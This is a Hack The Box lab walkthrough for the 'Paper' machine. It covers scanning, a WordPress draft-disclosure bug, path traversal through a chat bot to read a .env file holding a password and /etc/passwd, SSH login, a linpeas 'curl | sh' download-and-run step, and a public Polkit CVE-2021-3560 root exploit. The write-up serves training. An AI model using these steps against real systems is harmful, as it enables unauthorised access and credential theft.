
HTB Paper Writeup

INFO

Machine IP = 10.10.11.143
OS = Linux
Level = Easy
Points = 20

SCANNING

- Nmap:

# Nmap 7.92 scan initiated Sun Mar 13 11:10:47 2022 as: nmap -sV -sC -oA /home/kali/Desktop/nmap/Paper 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| tls-alpn: 
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 13 11:11:22 2022 -- 1 IP address (1 host up) scanned in 34.86 seconds

ENUMERATION

- Ports:

PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 8.0 (protocol 2.0)
80/tcp    open     http          Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp   open     ssl/http      Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

On port 80 we only have a simple static page.

- Gobuster:

gobuster dir -u http://10.10.11.143 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log

Gobuster found no useful information.

Checking the certificate of the HTTPS site on port 443 also gave us nothing.

Checking the response headers on port 80, we found a vhost [office.paper]; let's add it to the /etc/hosts file.

echo "10.10.11.143    office.paper" >> /etc/hosts

On our new vhost office.paper, checking the footer, the theme, and Wappalyzer [a browser extension] confirms a WordPress installation, version 5.2.3, which is vulnerable to Unauthenticated View Private/Draft Posts.

There is also one comment telling michael to remove the secret content in the drafts ASAP.

Normally, reading these drafts would require admin credentials, which we don't have yet.

With this vulnerability we just need to add ?static=1 after the URL.

http://office.paper/?static=1

In the results we get a new secret that tells us about a new vhost and a registration URL. Let's add the vhost to the /etc/hosts file.

sudo nano /etc/hosts

10.10.11.143    office.paper chat.office.paper

Go to the new vhost and then to the registration URL; we get the registration form, so let's register ourselves. After logging in, click on the general room.

In the chat there is a recyclops bot that helps the user list the sales directory with the list command, and with the file command we can view the content of a file.

I used the list and file commands to get the content inside the directory.

The list command lists the directory at the current path; let's try directory path traversal using ../

And we get the content of the parent directory. The hubot directory looks interesting; let's check its content.

We got a .env file. .env files are usually used to store secrets.

Let's check its content using file ../hubot/.env

And we got the username [recyclops] and password [Queenofblad3s!23].

Let's go back and check the users available on this machine using file ../../../etc/passwd, and we find that [dwight] has access to [/bin/bash].

USER FLAG

- Privilege Escalation [User]

So let's SSH in with the previous password and the user dwight, and we got user.txt.

[dwight@paper ~]$ cat user.txt 

ROOT FLAG

Let's run linPEAS.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

And we see this machine is vulnerable to CVE-2021-3560, that is Polkit or Pwnkit, which allows an unprivileged user to call privileged methods using D-Bus.

- Privilege Escalation [Root]

Let's get this Python script onto the machine and run it.

https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
$ chmod +x CVE-2021-3560.py 
$ python3 CVE-2021-3560.py 

You may need to run it multiple times.

Then we get the root.txt file.

[root@paper]# cat root.txt 


This post is licensed under CC BY 4.0 by the author.